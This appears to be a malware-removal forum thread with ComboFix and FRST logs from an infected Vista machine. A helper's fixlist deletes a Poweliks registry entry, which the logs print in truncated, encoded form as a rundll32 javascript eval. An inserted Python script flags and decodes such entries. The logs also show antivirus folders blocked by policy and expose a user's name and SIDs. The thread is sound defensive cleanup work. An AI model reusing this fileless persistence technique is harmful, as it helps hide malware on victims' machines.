(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown 
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ehTray.exe"="c:\windows\ehome\ehTray.exe" [2008-01-21 125952]
"Akamai NetSession Interface"="c:\users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe" [2014-04-18 4672920]
"iCloudServices"="c:\program files\Common Files\Apple\Internet Services\iCloudServices.exe" [2013-10-31 59720]
"com.apple.dav.bookmarks.daemon"="c:\program files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe" [2013-10-02 59720]
"ApplePhotoStreams"="c:\program files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe" [2013-10-31 59720]
"GUDelayStartup"="c:\program files\Glary Utilities 5\StartupManager.exe" [2014-08-18 37152]
"UINoteworthy"="c:\users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll" [2014-08-20 325632]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ECenter"="c:\dell\E-Center\EULALauncher.exe" [2008-02-29 17920]
"RtHDVCpl"="RtHDVCpl.exe" [2008-03-06 4706304]
"StartCCC"="c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2006-11-10 90112]
"dscactivate"="c:\program files\Dell Support Center\gs_agent\custom\dsca.exe" [2008-03-11 16384]
"PCMService"="c:\program files\Dell\MediaDirect\PCMService.exe" [2008-01-14 132392]
"AppleSyncNotifier"="c:\program files\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe" [2012-02-23 59240]
"HP Software Update"="c:\program files\HP\HP Software Update\HPWuSchd2.exe" [2007-05-08 54840]
"PMBVolumeWatcher"="c:\program files\Sony\PMB\PMBVolumeWatcher.exe" [2010-03-24 599328]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2011-06-15 997920]
"AVG_TRAY"="c:\program files\AVG\AVG10\avgtray.exe" [2011-09-10 2338656]
"APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2014-07-31 43816]
"acevents"="c:\program files\ActivIdentity\ActivClient\acevents.exe" [2009-06-03 153640]
"accrdsub"="c:\program files\ActivIdentity\ActivClient\accrdsub.exe" [2009-06-03 400936]
"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2013-11-21 959904]
"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2014-01-17 421888]
"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2014-08-01 152392]
"DameWare MRC Agent"="c:\windows\dwrcs\DWRCST.exe" [2012-11-02 379752]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"HideFastUserSwitching"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\explorer]
"UseDefaultTile"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]
BootExecute REG_MULTI_SZ   autocheck autochk * \0BootDefrag.exe\0sasnative32
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\hitmanpro37]
@=""
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\hitmanpro37.sys]
@=""
.
S2 ac.sharedstore;ActivIdentity Shared Store Service;c:\program files\Common Files\ActivIdentity\ac.sharedstore.exe [2009-06-03 207400]
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
HPZ12 REG_MULTI_SZ   Pml Driver HPZ12 Net Driver HPZ12
HPService REG_MULTI_SZ   HPSLPSVC
hpdevmgmt REG_MULTI_SZ   hpqcxs08 hpqddsvc
LocalServiceAndNoImpersonation REG_MULTI_SZ   FontCache
.
Contents of the 'Scheduled Tasks' folder
.
2014-08-25 c:\windows\Tasks\GlaryInitialize 5.job
- c:\program files\Glary Utilities 5\Initialize.exe [2014-08-18 01:05]
.
2014-08-25 c:\windows\Tasks\RtlNICDiagVistaStart.job
- c:\program files\Realtek\RTNICDiag\RTNICDiag.exe [2008-08-06 11:44]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.google.com/
uInternet Settings,ProxyOverride = *.local;<local>
TCP: DhcpNameServer = 192.168.2.1 66.18.32.2 66.18.32.3
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2014-08-25 11:08
Windows 6.0.6002 Service Pack 2 NTFS
.
scanning hidden processes ...  
.
scanning hidden autostart entries ... 
.
scanning hidden files ...  
.
scan completed successfully
hidden files: 0
.
**************************************************************************
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\*]
@Allowed: (B 1 4 5 6) (S-1-5-5-0-383984)
.
Completion time: 2014-08-25  11:10:46
ComboFix-quarantined-files.txt  2014-08-25 15:10
ComboFix2.txt  2014-08-24 19:45
ComboFix3.txt  2014-08-23 20:16
ComboFix4.txt  2014-08-23 18:22
.
Pre-Run: 238,789,816,320 bytes free
Post-Run: 238,726,463,488 bytes free
.
- - End Of File - - D0071B68A17A82DBD63337816FF7894D
5C616939100B85E558DA92B899A0FC36

Still no joy  :angry2:
I wonder if it's not a new modification.


Anyway we need to kill Poweliks prior to other baddies, so I'm gonna focus on it now.


Fix with Farbar Recovery Scan Tool

This fix was created for this user for use on that particular machine.
Running it on another one may cause damage and render the system unstable.

Press the Windows key + R on your keyboard at the same time. Type Notepad and click OK.

  • Copy the entire content of the codebox below and paste into the Notepad document:
    start
    HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
    CustomCLSID: HKU\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
    end
  • Click File, Save As and type fixlist.txt as the File Name.

Both files, FRST and fixlist.txt have to be in the same location or the fix will not work!

  • Right-click on the FRST icon and select Run as Administrator to start the tool.
    > XP users click run after receipt of Windows Security Warning - Open File.
    > 8 users will be prompted about Windows SmartScreen protection - click More information and Run.
  • Press the Fix button just once and wait.
  • If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
  • When finished FRST will generate a log on the Desktop, called Fixlog.txt.

Please include it in your reply.



Scan with Farbar Recovery Scan Tool

Please re-run Farbar Recovery Scan Tool.

  • Right-click on the FRST icon and select Run as Administrator to start the tool.
    > XP users click run after receipt of Windows Security Warning - Open File.
    > 8 users will be prompted about Windows SmartScreen protection - click More information and Run.
  • Make sure that Addition option is checked.
  • Press Scan button and wait.
  • The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.

Please include their content in your next reply.

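An added illustration of the entries this fix targets (not part of the original posts and not FRST's own logic): a Python triage pass over FRST-style registry lines that flags a rundll32 `javascript:` command, a per-user `localserver32` registration whose data is not a file path, and a Run value loading a DLL from AppData, then decodes the `eval("` fragment. The sample lines, SID, GUID and rule names are constructed placeholders, and the one-position character shift is inferred from the fragment itself.

```python
import re

# Constructed sample lines in the FRST entry formats quoted in this thread.
# The SID, GUID and "Example" names are placeholders, not values from the page.
SAMPLE_LOG = r'''
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)
HKU\S-1-5-21-0-0-0-1000\...\Run: [Example] => C:\Windows\system32\rundll32.exe "C:\Users\user\AppData\Local\Example\Example.dll",DllRegisterServer
CustomCLSID: HKU\S-1-5-21-0-0-0-1000_Classes\CLSID\{00000000-0000-0000-0000-000000000000}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters).
'''

# "<key> => <data>" (Run entries) or "<key> -> <data>" (CustomCLSID entries).
ENTRY = re.compile(r'^(?P<key>.+?)\s(?:=>|->)\s(?P<data>.+)$')

# rundll32 asked to evaluate script through mshtml instead of loading a DLL.
SCRIPT_HOST = re.compile(
    r'rundll32(?:\.exe)?"?\s+javascript:.*mshtml\s*,\s*RunHTMLApplication', re.I)

# COM server registered in a user's own Classes hive (no admin rights needed).
USER_COM_SERVER = re.compile(
    r'^(?:CustomCLSID:\s*)?HKU\\S-1-5-21-[\d-]+_Classes\\CLSID\\'
    r'\{[0-9A-F-]{36}\}\\localserver32$', re.I)

# A normal LocalServer32 value starts with a drive path or a %VARIABLE%.
PATH_LIKE = re.compile(r'"?(?:[A-Z]:\\|%)', re.I)

# rundll32 loading a DLL that lives under a user's AppData folder.
RUNDLL_APPDATA = re.compile(
    r'rundll32(?:\.exe)?"?\s+"?[A-Z]:\\Users\\[^\\]+\\AppData\\[^"]+\.dll', re.I)

# Text after eval(" up to the first space or quote. In the shifted text a
# real space appears as "!", so a literal space marks the end of the fragment.
EVAL_ARG = re.compile(r'eval\("([^\s"]+)')


def unshift(text, shift=1):
    """Undo a fixed character-code shift (each character moved up by `shift`)."""
    return ''.join(chr(ord(c) - shift) for c in text)


def scan(log):
    """Return one finding per suspicious registry line, in log order."""
    findings = []
    for line in log.splitlines():
        m = ENTRY.match(line.strip())
        if not m:
            continue
        key, data = m.group('key'), m.group('data')
        rules = []
        if SCRIPT_HOST.search(data):
            rules.append('rundll32-javascript')
        if USER_COM_SERVER.match(key) and not PATH_LIKE.match(data):
            rules.append('per-user-localserver32-not-a-path')
        if RUNDLL_APPDATA.search(data):
            rules.append('rundll32-loads-appdata-dll')
        if rules:
            frag = EVAL_ARG.search(data)
            findings.append({
                'key': key,
                'rules': rules,
                'decoded': unshift(frag.group(1)) if frag else None,
            })
    return findings


if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding['rules'], finding['key'])
        if finding['decoded']:
            print('  decoded fragment:', finding['decoded'])
```
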

Fixlog

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version:23-08-2014
Ran by savas.kyriakidis at 2014-08-25 13:39:24 Run:1
Running from F:\
Boot Mode: Normal
 
==============================================
 
Content of fixlist:
*****************
start
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
CustomCLSID: HKU\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
end
*****************
 
"HKU\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully.
"HKU\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
"HKU\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found.
 
==== End of Fixlog ====
 
FRST
 
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:23-08-2014
Ran by savas.kyriakidis (administrator) on SAVASKYRIAKI-PC on 25-08-2014 13:41:21
Running from F:\
Platform: Microsoft® Windows Vista™ Home Premium  Service Pack 2 (X86) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal
 
The only official download link for FRST:
Download link from any site other than Bleeping Computer is unpermitted or outdated.
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(Stardock Corporation) C:\Program Files\Dell\DellDock\DockLogin.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(ActivIdentity) C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgfws.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgwdsvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(SolarWinds) C:\Windows\dwrcs\DWRCS.EXE
( ) C:\Windows\System32\lxblcoms.exe
() C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe
(Sony Corporation) C:\Program Files\Sony\PMB\PMBDeviceInfoProvider.exe
() C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgnsx.exe
(SolarWinds) C:\Windows\dwrcs\DWRCST.EXE
(Realtek Semiconductor) C:\Windows\RtHDVCpl.exe
(CyberLink Corp.) C:\Program Files\Dell\MediaDirect\PCMService.exe
(Hewlett-Packard) C:\Program Files\HP\HP Software Update\hpwuSchd2.exe
(Sony Corporation) C:\Program Files\Sony\PMB\PMBVolumeWatcher.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe
(Adobe Systems Incorporated) C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Apple Inc.) C:\Program Files\QuickTime\QTTask.exe
(Stardock Corporation) C:\Program Files\Dell\DellDock\DellDock.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\iCloudServices.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acsagent.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
(Advanced Micro Devices Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Glarysoft Ltd) C:\Program Files\Glary Utilities 5\Integrator.exe
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(ATI Technologies Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqste08.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqbam08.exe
(Hewlett-Packard) C:\Program Files\HP\Digital Imaging\bin\hpqgpc01.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\APSDaemon.exe
(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe
(Microsoft Corporation) C:\Windows\System32\mobsync.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [ECenter] => C:\Dell\E-Center\EULALauncher.exe [17920 2008-02-29] ( )
HKLM\...\Run: [RtHDVCpl] => C:\Windows\RtHDVCpl.exe [4706304 2008-03-06] (Realtek Semiconductor)
HKLM\...\Run: [startCCC] => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [90112 2006-11-10] ()
HKLM\...\Run: [dscactivate] => C:\Program Files\Dell Support Center\gs_agent\custom\dsca.exe [16384 2008-03-11] ( )
HKLM\...\Run: [PCMService] => C:\Program Files\Dell\MediaDirect\PCMService.exe [132392 2008-01-14] (CyberLink Corp.)
HKLM\...\Run: [AppleSyncNotifier] => C:\Program Files\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe [59240 2012-02-23] (Apple Inc.)
HKLM\...\Run: [HP Software Update] => C:\Program Files\HP\HP Software Update\HPWuSchd2.exe [54840 2007-05-08] (Hewlett-Packard)
HKLM\...\Run: [PMBVolumeWatcher] => C:\Program Files\Sony\PMB\PMBVolumeWatcher.exe [599328 2010-03-24] (Sony Corporation)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [997920 2011-06-15] (Microsoft Corporation)
HKLM\...\Run: [AVG_TRAY] => C:\Program Files\AVG\AVG10\avgtray.exe [2338656 2011-09-10] (AVG Technologies CZ, s.r.o.)
HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [43816 2014-07-31] (Apple Inc.)
HKLM\...\Run: [acevents] => C:\Program Files\ActivIdentity\ActivClient\acevents.exe [153640 2009-06-03] (ActivIdentity)
HKLM\...\Run: [accrdsub] => C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe [400936 2009-06-03] (ActivIdentity)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [152392 2014-08-01] (Apple Inc.)
HKLM\...\Run: [DameWare MRC Agent] => C:\Windows\dwrcs\DWRCST.exe [379752 2012-11-02] (SolarWinds)
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Malwarebytes <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\AVAST Software <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\AVG <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\AVG <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\McAfee <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware <====== ATTENTION
HKLM\...\Policies\Explorer: [useDefaultTile] 0
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [Akamai NetSession Interface] => C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe [4672920 2014-04-17] (Akamai Technologies, Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [iCloudServices] => C:\Program Files\Common Files\Apple\Internet Services\iCloudServices.exe [59720 2013-10-31] (Apple Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [com.apple.dav.bookmarks.daemon] => C:\Program Files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe [59720 2013-10-02] (Apple Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [ApplePhotoStreams] => C:\Program Files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe [59720 2013-10-31] (Apple Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [GUDelayStartup] => C:\Program Files\Glary Utilities 5\StartupManager.exe [37152 2014-08-17] (Glarysoft Ltd)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [uINoteworthy] => C:\Windows\system32\rundll32.exe "C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll",DllRegisterServer <===== ATTENTION
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ActivClient Agent.lnk
ShortcutTarget: ActivClient Agent.lnk -> C:\Program Files\ActivIdentity\ActivClient\acsagent.exe (ActivIdentity)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk
ShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Metacafe.lnk
ShortcutTarget: Metacafe.lnk -> C:\$RECYCLE.BIN\S-1-5-21-3726736968-409882640-1958551794-1000\MetacafeAgent.exe (No File)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NETGEAR WNA1100 Smart Wizard.lnk
ShortcutTarget: NETGEAR WNA1100 Smart Wizard.lnk -> C:\Program Files\NETGEAR\WNA1100\WNA1100.exe ()
Startup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnk
ShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
Startup: C:\Users\Rita\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnk
ShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Rita\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
Startup: C:\Users\savas.kyriakidis\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnk
ShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\savas.kyriakidis\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
BootExecute: autocheck autochk *  BootDefrag.exesasnative32
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0xA02BBBD1D537CF01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-us
SearchScopes: HKCU - DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO: SSVHelper Class -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll (Sun Microsystems, Inc.)
BHO: CBrowserHelperObject Object -> {CA6319C0-31B7-401E-A518-A07C3DB8F777} -> C:\Program Files\Dell\BAE\BAE.dll (Dell Inc.)
BHO: HP Smart BHO Class -> {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} -> C:\Program Files\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll (Hewlett-Packard Co.)
Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
DPF: {5D637FAD-E202-48D1-8F18-5B9C459BD1E3} http://www.winkflash.com/photo/loaders/ImageUploader5.cab
DPF: {82E5DF24-51E8-47CD-864A-F4BD5005AA73} https://www.icloud.com/system/iCloud.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG10\avgpp.dll (AVG Technologies CZ, s.r.o.)
Winsock: Catalog5 01 %SystemRoot%\System32\mswsock.dll [223232] (Microsoft Corporation) ATTENTION: The LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1 66.18.32.2 66.18.32.3
 
FireFox:
========
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\4.0.60831.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-08-06]
FF HKLM\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2
FF Extension: HP Smart Web Printing - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2 [2010-09-02]
FF HKLM\...\Firefox\Extensions: [{1E73965B-8B48-48be-9C8D-68B920ABC1C4}] - C:\Program Files\AVG\AVG10\Firefox4
FF Extension: AVG Safe Search - C:\Program Files\AVG\AVG10\Firefox4 [2011-07-10]
FF HKCU\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2
 
Chrome: 
=======
CHR HKLM\...\Chrome\Extension: [icmlaeflemplmjndnaapfdbbnpncnbda] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx []
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 ac.sharedstore; C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe [207400 2009-06-03] (ActivIdentity)
S3 AVG Security Toolbar Service; C:\Program Files\AVG\AVG10\Toolbar\ToolbarBroker.exe [167264 2011-11-10] ()
R2 avgfws; C:\Program Files\AVG\AVG10\avgfws.exe [2708024 2011-03-09] (AVG Technologies CZ, s.r.o.)
S2 AVGIDSAgent; C:\Program Files\AVG\AVG10\Identity Protection\Agent\Bin\AVGIDSAgent.exe [7390560 2011-08-18] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files\AVG\AVG10\avgwdsvc.exe [269520 2011-02-08] (AVG Technologies CZ, s.r.o.)
R2 DockLoginService; C:\Program Files\Dell\DellDock\DockLogin.exe [161048 2008-04-28] (Stardock Corporation)
R2 dwmrcs; C:\Windows\dwrcs\DWRCS.EXE [705384 2012-11-02] (SolarWinds)
R3 hpqcxs08; C:\Program Files\HP\Digital Imaging\bin\hpqcxs08.dll [217088 2008-10-16] (Hewlett-Packard Co.) [File not signed]
R2 hpqddsvc; C:\Program Files\HP\Digital Imaging\bin\hpqddsvc.dll [135168 2008-10-16] (Hewlett-Packard Co.) [File not signed]
